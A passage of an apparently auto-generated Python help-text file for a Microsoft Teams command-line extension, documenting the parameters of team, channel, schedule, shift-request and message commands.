disabled-plans: A collection of the unique identifiers for plans that have been disabled.
sku-id: The unique identifier for the SKU.
Multiple actions can be specified by using more than one --assigned-licenses argument.
- name: --license-processing-state
short-summary: "licenseProcessingState"
long-summary: |
Usage: --license-processing-state state=XX
- name: --on-premises-provisioning-errors
short-summary: "Errors when using Microsoft synchronization product during provisioning. Returned by default."
long-summary: |
Usage: --on-premises-provisioning-errors category=XX occurred-date-time=XX property-causing-error=XX \
value=XX
category: Category of the provisioning error. Note: Currently, there is only one possible value. Possible \
value: PropertyConflict - indicates a property value is not unique. Other objects contain the same value for the \
property.
occurred-date-time: The date and time at which the error occurred.
property-causing-error: Name of the directory property causing the error. Current possible values: \
UserPrincipalName or ProxyAddress
value: Value of the property causing the error.
Multiple actions can be specified by using more than one --on-premises-provisioning-errors argument.
- name: --app-role-assignments
long-summary: |
Usage: --app-role-assignments app-role-id=XX created-date-time=XX principal-display-name=XX \
principal-id=XX principal-type=XX resource-display-name=XX resource-id=XX deleted-date-time=XX id=XX
app-role-id: The identifier (id) for the app role which is assigned to the principal. This app role must \
be exposed in the appRoles property on the resource application's service principal (resourceId). If the resource \
application has not declared any app roles, a default app role ID of 00000000-0000-0000-0000-000000000000 can be \
specified to signal that the principal is assigned to the resource app without any specific app roles. Required on \
create. Does not support $filter.
principal-display-name: The display name of the user, group, or service principal that was granted the app \
role assignment. Read-only. Supports $filter (eq and startswith).
principal-id: The unique identifier (id) for the user, group or service principal being granted the app \
role. Required on create. Does not support $filter.
principal-type: The type of the assigned principal. This can either be 'User', 'Group' or \
'ServicePrincipal'. Read-only. Does not support $filter.
resource-display-name: The display name of the resource app's service principal to which the assignment is \
made. Does not support $filter.
resource-id: The unique identifier (id) for the resource service principal for which the assignment is \
made. Required on create. Supports $filter (eq only).
id: Read-only.
Multiple actions can be specified by using more than one --app-role-assignments argument.
- name: --created-on-behalf-of
short-summary: "Represents an Azure Active Directory object. The directoryObject type is the base type for \
many other directory entity types."
long-summary: |
Usage: --created-on-behalf-of deleted-date-time=XX id=XX
id: Read-only.
- name: --member-of
short-summary: "Groups that this group is a member of. HTTP Methods: GET (supported for all groups). \
Read-only. Nullable."
long-summary: |
Usage: --member-of deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --member-of argument.
- name: --microsoft-graph-group-members
short-summary: "Users and groups that are members of this group. HTTP Methods: GET (supported for all groups), \
POST (supported for Microsoft 365 groups, security groups and mail-enabled security groups), DELETE (supported for \
Microsoft 365 groups and security groups) Nullable."
long-summary: |
Usage: --microsoft-graph-group-members deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --microsoft-graph-group-members argument.
- name: --members-with-license-errors
short-summary: "A list of group members with license errors from this group-based license assignment. \
Read-only."
long-summary: |
Usage: --members-with-license-errors deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --members-with-license-errors argument.
- name: --owners
short-summary: "The owners of the group. The owners are a set of non-admin users who are allowed to modify \
this object. Limited to 100 owners. HTTP Methods: GET (supported for all groups), POST (supported for Microsoft 365 \
groups, security groups and mail-enabled security groups), DELETE (supported for Microsoft 365 groups and security \
groups). Nullable."
long-summary: |
Usage: --owners deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --owners argument.
- name: --transitive-member-of
long-summary: |
Usage: --transitive-member-of deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --transitive-member-of argument.
- name: --transitive-members
long-summary: |
Usage: --transitive-members deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --transitive-members argument.
- name: --accepted-senders
short-summary: "The list of users or groups that are allowed to create post's or calendar events in this \
group. If this list is non-empty then only users or groups listed here are allowed to post."
long-summary: |
Usage: --accepted-senders deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --accepted-senders argument.
- name: --photo
short-summary: "profilePhoto"
long-summary: |
Usage: --photo height=XX width=XX id=XX
height: The height of the photo. Read-only.
width: The width of the photo. Read-only.
id: Read-only.
- name: --photos
short-summary: "The profile photos owned by the group. Read-only. Nullable."
long-summary: |
Usage: --photos height=XX width=XX id=XX
height: The height of the photo. Read-only.
width: The width of the photo. Read-only.
id: Read-only.
Multiple actions can be specified by using more than one --photos argument.
- name: --rejected-senders
short-summary: "The list of users or groups that are not allowed to create posts or calendar events in this \
group. Nullable"
long-summary: |
Usage: --rejected-senders deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --rejected-senders argument.
- name: --extensions
short-summary: "The collection of open extensions defined for the group. Read-only. Nullable."
long-summary: |
Usage: --extensions id=XX
id: Read-only.
Multiple actions can be specified by using more than one --extensions argument.
- name: --group-lifecycle-policies
short-summary: "The collection of lifecycle policies for this group. Read-only. Nullable."
long-summary: |
Usage: --group-lifecycle-policies alternate-notification-emails=XX group-lifetime-in-days=XX \
managed-group-types=XX id=XX
alternate-notification-emails: List of email address to send notifications for groups without owners. \
Multiple email address can be defined by separating email address with a semicolon.
group-lifetime-in-days: Number of days before a group expires and needs to be renewed. Once renewed, the \
group expiration is extended by the number of days defined.
managed-group-types: The group type for which the expiration policy applies. Possible values are All, \
Selected or None.
id: Read-only.
Multiple actions can be specified by using more than one --group-lifecycle-policies argument.
- name: --offer-shift-requests
long-summary: |
Usage: --offer-shift-requests recipient-action-date-time=XX recipient-action-message=XX \
recipient-user-id=XX sender-shift-id=XX assigned-to=XX manager-action-date-time=XX manager-action-message=XX \
manager-user-id=XX sender-date-time=XX sender-message=XX sender-user-id=XX state=XX created-date-time=XX \
last-modified-date-time=XX application=XX device=XX user=XX id=XX
recipient-action-date-time: The Timestamp type represents date and time information using ISO 8601 format \
and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
recipient-action-message: Custom message sent by recipient of the offer shift request.
recipient-user-id: User ID of the recipient of the offer shift request.
sender-shift-id: User ID of the sender of the offer shift request.
created-date-time: The Timestamp type represents date and time information using ISO 8601 format and is \
always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
last-modified-date-time: The Timestamp type represents date and time information using ISO 8601 format and \
is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
application: identity
device: identity
user: identity
id: Read-only.
Multiple actions can be specified by using more than one --offer-shift-requests argument.
- name: --open-shift-change-requests
long-summary: |
Usage: --open-shift-change-requests open-shift-id=XX assigned-to=XX manager-action-date-time=XX \
manager-action-message=XX manager-user-id=XX sender-date-time=XX sender-message=XX sender-user-id=XX state=XX \
created-date-time=XX last-modified-date-time=XX application=XX device=XX user=XX id=XX
open-shift-id: ID for the open shift.
created-date-time: The Timestamp type represents date and time information using ISO 8601 format and is \
always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
last-modified-date-time: The Timestamp type represents date and time information using ISO 8601 format and \
is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
application: identity
device: identity
user: identity
id: Read-only.
Multiple actions can be specified by using more than one --open-shift-change-requests argument.
- name: --scheduling-groups
short-summary: "The logical grouping of users in the schedule (usually by role)."
long-summary: |
Usage: --scheduling-groups display-name=XX is-active=XX user-ids=XX created-date-time=XX \
last-modified-date-time=XX application=XX device=XX user=XX id=XX
display-name: The display name for the schedulingGroup. Required.
is-active: Indicates whether the schedulingGroup can be used when creating new entities or updating \
existing ones. Required.
user-ids: The list of user IDs that are a member of the schedulingGroup. Required.
created-date-time: The Timestamp type represents date and time information using ISO 8601 format and is \
always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
last-modified-date-time: The Timestamp type represents date and time information using ISO 8601 format and \
is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
application: identity
device: identity
user: identity
id: Read-only.
Multiple actions can be specified by using more than one --scheduling-groups argument.
- name: --swap-shifts-change-requests
long-summary: |
Usage: --swap-shifts-change-requests recipient-shift-id=XX recipient-action-date-time=XX \
recipient-action-message=XX recipient-user-id=XX sender-shift-id=XX assigned-to=XX manager-action-date-time=XX \
manager-action-message=XX manager-user-id=XX sender-date-time=XX sender-message=XX sender-user-id=XX state=XX \
created-date-time=XX last-modified-date-time=XX application=XX device=XX user=XX id=XX
recipient-shift-id: ShiftId for the recipient user with whom the request is to swap.
recipient-action-date-time: The Timestamp type represents date and time information using ISO 8601 format \
and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
recipient-action-message: Custom message sent by recipient of the offer shift request.
recipient-user-id: User ID of the recipient of the offer shift request.
sender-shift-id: User ID of the sender of the offer shift request.
created-date-time: The Timestamp type represents date and time information using ISO 8601 format and is \
always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
last-modified-date-time: The Timestamp type represents date and time information using ISO 8601 format and \
is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
application: identity
device: identity
user: identity
id: Read-only.
Multiple actions can be specified by using more than one --swap-shifts-change-requests argument.
- name: --time-off-reasons
short-summary: "The set of reasons for a time off in the schedule."
long-summary: |
Usage: --time-off-reasons display-name=XX icon-type=XX is-active=XX created-date-time=XX \
last-modified-date-time=XX application=XX device=XX user=XX id=XX
display-name: The name of the timeOffReason. Required.
is-active: Indicates whether the timeOffReason can be used when creating new entities or updating existing \
ones. Required.
created-date-time: The Timestamp type represents date and time information using ISO 8601 format and is \
always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
last-modified-date-time: The Timestamp type represents date and time information using ISO 8601 format and \
is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
application: identity
device: identity
user: identity
id: Read-only.
Multiple actions can be specified by using more than one --time-off-reasons argument.
- name: --time-off-requests
long-summary: |
Usage: --time-off-requests end-date-time=XX start-date-time=XX time-off-reason-id=XX assigned-to=XX \
manager-action-date-time=XX manager-action-message=XX manager-user-id=XX sender-date-time=XX sender-message=XX \
sender-user-id=XX state=XX created-date-time=XX last-modified-date-time=XX application=XX device=XX user=XX id=XX
end-date-time: The Timestamp type represents date and time information using ISO 8601 format and is always \
in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
start-date-time: The Timestamp type represents date and time information using ISO 8601 format and is \
always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
time-off-reason-id: The reason for the time off.
created-date-time: The Timestamp type represents date and time information using ISO 8601 format and is \
always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
last-modified-date-time: The Timestamp type represents date and time information using ISO 8601 format and \
is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
application: identity
device: identity
user: identity
id: Read-only.
Multiple actions can be specified by using more than one --time-off-requests argument.
"""
helps['teams team delete-team'] = """
type: command
short-summary: "Delete entity from teams."
"""
helps['teams team show-team'] = """
type: command
short-summary: "Get entity from teams by key."
"""
helps['teams team'] = """
type: group
short-summary: Manage team with teams_v1_0
"""
helps['teams team archive'] = """
type: command
short-summary: "Invoke action archive."
"""
helps['teams team clone'] = """
type: command
short-summary: "Invoke action clone."
"""
helps['teams team create-channel'] = """
type: command
short-summary: "Create new navigation property to channels for teams."
parameters:
- name: --members
long-summary: |
Usage: --members display-name=XX roles=XX id=XX
display-name: The display name of the user.
roles: The roles for that user.
id: Read-only.
Multiple actions can be specified by using more than one --members argument.
"""
helps['teams team create-installed-app'] = """
type: command
short-summary: "Create new navigation property to installedApps for teams."
parameters:
- name: --teams-app-definition
short-summary: "teamsAppDefinition"
long-summary: |
Usage: --teams-app-definition display-name=XX teams-app-id=XX version=XX id=XX
display-name: The name of the app provided by the app developer.
teams-app-id: The ID from the Teams app manifest.
version: The version number of the application.
id: Read-only.
- name: --app-definitions
short-summary: "The details for each version of the app."
long-summary: |
Usage: --app-definitions display-name=XX teams-app-id=XX version=XX id=XX
display-name: The name of the app provided by the app developer.
teams-app-id: The ID from the Teams app manifest.
version: The version number of the application.
id: Read-only.
Multiple actions can be specified by using more than one --app-definitions argument.
"""
helps['teams team create-member'] = """
type: command
short-summary: "Create new navigation property to members for teams."
"""
helps['teams team create-operation'] = """
type: command
short-summary: "Create new navigation property to operations for teams."
parameters:
- name: --error
short-summary: "operationError"
long-summary: |
Usage: --error code=XX message=XX
code: Operation error code.
message: Operation error message.
"""
helps['teams team delete-channel'] = """
type: command
short-summary: "Delete navigation property channels for teams."
"""
helps['teams team delete-installed-app'] = """
type: command
short-summary: "Delete navigation property installedApps for teams."
"""
helps['teams team delete-member'] = """
type: command
short-summary: "Delete navigation property members for teams."
"""
helps['teams team delete-operation'] = """
type: command
short-summary: "Delete navigation property operations for teams."
"""
helps['teams team delete-primary-channel'] = """
type: command
short-summary: "Delete navigation property primaryChannel for teams."
"""
helps['teams team delete-ref-group'] = """
type: command
short-summary: "Delete ref of navigation property group for teams."
"""
helps['teams team delete-ref-template'] = """
type: command
short-summary: "Delete ref of navigation property template for teams."
"""
helps['teams team delete-schedule'] = """
type: command
short-summary: "Delete navigation property schedule for teams."
"""
helps['teams team list-channel'] = """
type: command
short-summary: "Get channels from teams."
"""
helps['teams team list-installed-app'] = """
type: command
short-summary: "Get installedApps from teams."
"""
helps['teams team list-member'] = """
type: command
short-summary: "Get members from teams."
"""
helps['teams team list-operation'] = """
type: command
short-summary: "Get operations from teams."
"""
helps['teams team set-ref-group'] = """
type: command
short-summary: "Update the ref of navigation property group in teams."
"""
helps['teams team set-ref-template'] = """
type: command
short-summary: "Update the ref of navigation property template in teams."
"""
helps['teams team show-all-message'] = """
type: command
short-summary: "Invoke function getAllMessages."
"""
helps['teams team show-channel'] = """
type: command
short-summary: "Get channels from teams."
"""
helps['teams team show-group'] = """
type: command
short-summary: "Get group from teams."
"""
helps['teams team show-installed-app'] = """
type: command
short-summary: "Get installedApps from teams."
"""
helps['teams team show-member'] = """
type: command
short-summary: "Get members from teams."
"""
helps['teams team show-operation'] = """
type: command
short-summary: "Get operations from teams."
"""
helps['teams team show-primary-channel'] = """
type: command
short-summary: "Get primaryChannel from teams."
"""
helps['teams team show-ref-group'] = """
type: command
short-summary: "Get ref of group from teams."
"""
helps['teams team show-ref-template'] = """
type: command
short-summary: "Get ref of template from teams."
"""
helps['teams team show-schedule'] = """
type: command
short-summary: "Get schedule from teams."
"""
helps['teams team show-template'] = """
type: command
short-summary: "Get template from teams."
"""
helps['teams team unarchive'] = """
type: command
short-summary: "Invoke action unarchive."
"""
helps['teams team update-channel'] = """
type: command
short-summary: "Update the navigation property channels in teams."
parameters:
- name: --members
long-summary: |
Usage: --members display-name=XX roles=XX id=XX
display-name: The display name of the user.
roles: The roles for that user.
id: Read-only.
Multiple actions can be specified by using more than one --members argument.
"""
helps['teams team update-installed-app'] = """
type: command
short-summary: "Update the navigation property installedApps in teams."
parameters:
- name: --teams-app-definition
short-summary: "teamsAppDefinition"
long-summary: |
Usage: --teams-app-definition display-name=XX teams-app-id=XX version=XX id=XX
display-name: The name of the app provided by the app developer.
teams-app-id: The ID from the Teams app manifest.
version: The version number of the application.
id: Read-only.
- name: --app-definitions
short-summary: "The details for each version of the app."
long-summary: |
Usage: --app-definitions display-name=XX teams-app-id=XX version=XX id=XX
display-name: The name of the app provided by the app developer.
teams-app-id: The ID from the Teams app manifest.
version: The version number of the application.
id: Read-only.
Multiple actions can be specified by using more than one --app-definitions argument.
"""
helps['teams team update-member'] = """
type: command
short-summary: "Update the navigation property members in teams."
"""
helps['teams team update-operation'] = """
type: command
short-summary: "Update the navigation property operations in teams."
parameters:
- name: --error
short-summary: "operationError"
long-summary: |
Usage: --error code=XX message=XX
code: Operation error code.
message: Operation error message.
"""
helps['teams team update-primary-channel'] = """
type: command
short-summary: "Update the navigation property primaryChannel in teams."
parameters:
- name: --members
long-summary: |
Usage: --members display-name=XX roles=XX id=XX
display-name: The display name of the user.
roles: The roles for that user.
id: Read-only.
Multiple actions can be specified by using more than one --members argument.
"""
helps['teams team update-schedule'] = """
type: command
short-summary: "Update the navigation property schedule in teams."
parameters:
- name: --offer-shift-requests
long-summary: |
Usage: --offer-shift-requests recipient-action-date-time=XX recipient-action-message=XX \
recipient-user-id=XX sender-shift-id=XX assigned-to=XX manager-action-date-time=XX manager-action-message=XX \
manager-user-id=XX sender-date-time=XX sender-message=XX sender-user-id=XX state=XX created-date-time=XX \
last-modified-date-time=XX application=XX device=XX user=XX id=XX
recipient-action-date-time: The Timestamp type represents date and time information using ISO 8601 format \
and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
recipient-action-message: Custom message sent by recipient of the offer shift request.
recipient-user-id: User ID of the recipient of the offer shift request.
sender-shift-id: User ID of the sender of the offer shift request.
created-date-time: The Timestamp type represents date and time information using ISO 8601 format and is \
always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
last-modified-date-time: The Timestamp type represents date and time information using ISO 8601 format and \
is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
application: identity
device: identity
user: identity
id: Read-only.
Multiple actions can be specified by using more than one --offer-shift-requests argument.
- name: --open-shift-change-requests
long-summary: |
Usage: --open-shift-change-requests open-shift-id=XX assigned-to=XX manager-action-date-time=XX \
manager-action-message=XX manager-user-id=XX sender-date-time=XX sender-message=XX sender-user-id=XX state=XX \
created-date-time=XX last-modified-date-time=XX application=XX device=XX user=XX id=XX
open-shift-id: ID for the open shift.
created-date-time: The Timestamp type represents date and time information using ISO 8601 format and is \
always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
last-modified-date-time: The Timestamp type represents date and time information using ISO 8601 format and \
is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
application: identity
device: identity
user: identity
id: Read-only.
Multiple actions can be specified by using more than one --open-shift-change-requests argument.
- name: --scheduling-groups
short-summary: "The logical grouping of users in the schedule (usually by role)."
long-summary: |
Usage: --scheduling-groups display-name=XX is-active=XX user-ids=XX created-date-time=XX \
last-modified-date-time=XX application=XX device=XX user=XX id=XX
display-name: The display name for the schedulingGroup. Required.
is-active: Indicates whether the schedulingGroup can be used when creating new entities or updating \
existing ones. Required.
user-ids: The list of user IDs that are a member of the schedulingGroup. Required.
created-date-time: The Timestamp type represents date and time information using ISO 8601 format and is \
always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
last-modified-date-time: The Timestamp type represents date and time information using ISO 8601 format and \
is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
application: identity
device: identity
user: identity
id: Read-only.
Multiple actions can be specified by using more than one --scheduling-groups argument.
- name: --swap-shifts-change-requests
long-summary: |
Usage: --swap-shifts-change-requests recipient-shift-id=XX recipient-action-date-time=XX \
recipient-action-message=XX recipient-user-id=XX sender-shift-id=XX assigned-to=XX manager-action-date-time=XX \
manager-action-message=XX manager-user-id=XX sender-date-time=XX sender-message=XX sender-user-id=XX state=XX \
created-date-time=XX last-modified-date-time=XX application=XX device=XX user=XX id=XX
recipient-shift-id: ShiftId for the recipient user with whom the request is to swap.
recipient-action-date-time: The Timestamp type represents date and time information using ISO 8601 format \
and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
recipient-action-message: Custom message sent by recipient of the offer shift request.
recipient-user-id: User ID of the recipient of the offer shift request.
sender-shift-id: User ID of the sender of the offer shift request.
created-date-time: The Timestamp type represents date and time information using ISO 8601 format and is \
always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
last-modified-date-time: The Timestamp type represents date and time information using ISO 8601 format and \
is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
application: identity
device: identity
user: identity
id: Read-only.
Multiple actions can be specified by using more than one --swap-shifts-change-requests argument.
- name: --time-off-reasons
short-summary: "The set of reasons for a time off in the schedule."
long-summary: |
Usage: --time-off-reasons display-name=XX icon-type=XX is-active=XX created-date-time=XX \
last-modified-date-time=XX application=XX device=XX user=XX id=XX
display-name: The name of the timeOffReason. Required.
is-active: Indicates whether the timeOffReason can be used when creating new entities or updating existing \
ones. Required.
created-date-time: The Timestamp type represents date and time information using ISO 8601 format and is \
always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
last-modified-date-time: The Timestamp type represents date and time information using ISO 8601 format and \
is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
application: identity
device: identity
user: identity
id: Read-only.
Multiple actions can be specified by using more than one --time-off-reasons argument.
- name: --time-off-requests
long-summary: |
Usage: --time-off-requests end-date-time=XX start-date-time=XX time-off-reason-id=XX assigned-to=XX \
manager-action-date-time=XX manager-action-message=XX manager-user-id=XX sender-date-time=XX sender-message=XX \
sender-user-id=XX state=XX created-date-time=XX last-modified-date-time=XX application=XX device=XX user=XX id=XX
end-date-time: The Timestamp type represents date and time information using ISO 8601 format and is always \
in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
start-date-time: The Timestamp type represents date and time information using ISO 8601 format and is \
always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
time-off-reason-id: The reason for the time off.
created-date-time: The Timestamp type represents date and time information using ISO 8601 format and is \
always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
last-modified-date-time: The Timestamp type represents date and time information using ISO 8601 format and \
is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
application: identity
device: identity
user: identity
id: Read-only.
Multiple actions can be specified by using more than one --time-off-requests argument.
"""
helps['teams team-channel'] = """
type: group
short-summary: Manage team channel with teams_v1_0
"""
helps['teams team-channel create-member'] = """
type: command
short-summary: "Create new navigation property to members for teams."
"""
helps['teams team-channel create-message'] = """
type: command
short-summary: "Create new navigation property to messages for teams."
parameters:
- name: --attachments
short-summary: "Attached files. Attachments are currently read-only – sending attachments is not supported."
long-summary: |
Usage: --attachments content=XX content-type=XX content-url=XX id=XX name=XX thumbnail-url=XX
content: The content of the attachment. If the attachment is a rich card, set the property to the rich \
card object. This property and contentUrl are mutually exclusive.
content-type: The media type of the content attachment. It can have the following values: reference: \
Attachment is a link to another file. Populate the contentURL with the link to the object.file: Raw file attachment. \
Populate the contenturl field with the base64 encoding of the file in data: format.image/: Image type with the type of \
the image specified ex: image/png, image/jpeg, image/gif. Populate the contentUrl field with the base64 encoding of \
the file in data: format.video/: Video type with the format specified. Ex: video/mp4. Populate the contentUrl field \
with the base64 encoding of the file in data: format.audio/: Audio type with the format specified. Ex: audio/wmw. \
Populate the contentUrl field with the base64 encoding of the file in data: format.application/card type: Rich card \
attachment type with the card type specifying the exact card format to use. Set content with the json format of the \
card. Supported values for card type include:application/vnd.microsoft.card.adaptive: A rich card that can contain any \
combination of text, speech, images,,buttons, and input fields. Set the content property to,an AdaptiveCard \
object.application/vnd.microsoft.card.animation: A rich card that plays animation. Set the content property,to an \
AnimationCardobject.application/vnd.microsoft.card.audio: A rich card that plays audio files. Set the content \
property,to an AudioCard object.application/vnd.microsoft.card.video: A rich card that plays videos. Set the content \
property,to a VideoCard object.application/vnd.microsoft.card.hero: A Hero card. Set the content property to a \
HeroCard object.application/vnd.microsoft.card.thumbnail: A Thumbnail card. Set the content property to a \
ThumbnailCard object.application/vnd.microsoft.com.card.receipt: A Receipt card. Set the content property to a \
ReceiptCard object.application/vnd.microsoft.com.card.signin: A user Sign In card. Set the content property to a \
SignInCard object.
content-url: URL for the content of the attachment. Supported protocols: http, https, file and data.
id: Read-only. Unique id of the attachment.
name: Name of the attachment.
thumbnail-url: URL to a thumbnail image that the channel can use if it supports using an alternative, \
smaller form of content or contentUrl. For example, if you set contentType to application/word and set contentUrl to \
the location of the Word document, you might include a thumbnail image that represents the document. The channel could \
display the thumbnail image instead of the document. When the user clicks the image, the channel would open the \
document.
Multiple actions can be specified by using more than one --attachments argument.
- name: --body
short-summary: "itemBody"
long-summary: |
Usage: --body content=XX content-type=XX
content: The content of the item.
- name: --hosted-contents
long-summary: |
Usage: --hosted-contents id=XX
id: Read-only.
Multiple actions can be specified by using more than one --hosted-contents argument.
- name: --policy-tip
short-summary: "chatMessagePolicyViolationPolicyTip"
long-summary: |
Usage: --policy-tip compliance-url=XX general-text=XX matched-condition-descriptions=XX
- name: --application
short-summary: "identity"
long-summary: |
Usage: --application display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --device
short-summary: "identity"
long-summary: |
Usage: --device display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --user
short-summary: "identity"
long-summary: |
Usage: --user display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
"""
helps['teams team-channel create-tab'] = """
type: command
short-summary: "Create new navigation property to tabs for teams."
parameters:
- name: --configuration
short-summary: "teamsTabConfiguration"
long-summary: |
Usage: --configuration content-url=XX entity-id=XX remove-url=XX website-url=XX
content-url: Url used for rendering tab contents in Teams. Required.
entity-id: Identifier for the entity hosted by the tab provider.
remove-url: Url called by Teams client when a Tab is removed using the Teams Client.
website-url: Url for showing tab contents outside of Teams.
- name: --app-definitions
short-summary: "The details for each version of the app."
long-summary: |
Usage: --app-definitions display-name=XX teams-app-id=XX version=XX id=XX
display-name: The name of the app provided by the app developer.
teams-app-id: The ID from the Teams app manifest.
version: The version number of the application.
id: Read-only.
Multiple actions can be specified by using more than one --app-definitions argument.
"""
helps['teams team-channel delete-file-folder'] = """
type: command
short-summary: "Delete navigation property filesFolder for teams."
"""
helps['teams team-channel delete-member'] = """
type: command
short-summary: "Delete navigation property members for teams."
"""
helps['teams team-channel delete-message'] = """
type: command
short-summary: "Delete navigation property messages for teams."
"""
helps['teams team-channel delete-tab'] = """
type: command
short-summary: "Delete navigation property tabs for teams."
"""
helps['teams team-channel list-member'] = """
type: command
short-summary: "Get members from teams."
"""
helps['teams team-channel list-message'] = """
type: command
short-summary: "Get messages from teams."
"""
helps['teams team-channel list-tab'] = """
type: command
short-summary: "Get tabs from teams."
"""
helps['teams team-channel show-file-folder'] = """
type: command
short-summary: "Get filesFolder from teams."
"""
helps['teams team-channel show-member'] = """
type: command
short-summary: "Get members from teams."
"""
helps['teams team-channel show-message'] = """
type: command
short-summary: "Get messages from teams."
"""
helps['teams team-channel show-tab'] = """
type: command
short-summary: "Get tabs from teams."
"""
helps['teams team-channel update-file-folder'] = """
type: command
short-summary: "Update the navigation property filesFolder in teams."
parameters:
- name: --sharepoint-ids
short-summary: "sharepointIds"
long-summary: |
Usage: --sharepoint-ids list-id=XX list-item-id=XX list-item-unique-id=XX site-id=XX site-url=XX \
tenant-id=XX web-id=XX
list-id: The unique identifier (guid) for the item's list in SharePoint.
list-item-id: An integer identifier for the item within the containing list.
list-item-unique-id: The unique identifier (guid) for the item within OneDrive for Business or a \
SharePoint site.
site-id: The unique identifier (guid) for the item's site collection (SPSite).
site-url: The SharePoint URL for the site that contains the item.
tenant-id: The unique identifier (guid) for the tenancy.
web-id: The unique identifier (guid) for the item's site (SPWeb).
- name: --application
short-summary: "identity"
long-summary: |
Usage: --application display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --device
short-summary: "identity"
long-summary: |
Usage: --device display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --user
short-summary: "identity"
long-summary: |
Usage: --user display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --microsoft-graph-identity-application
short-summary: "identity"
long-summary: |
Usage: --microsoft-graph-identity-application display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --microsoft-graph-identity-device
short-summary: "identity"
long-summary: |
Usage: --microsoft-graph-identity-device display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --microsoft-graph-identity-user
short-summary: "identity"
long-summary: |
Usage: --microsoft-graph-identity-user display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --audio
short-summary: "audio"
long-summary: |
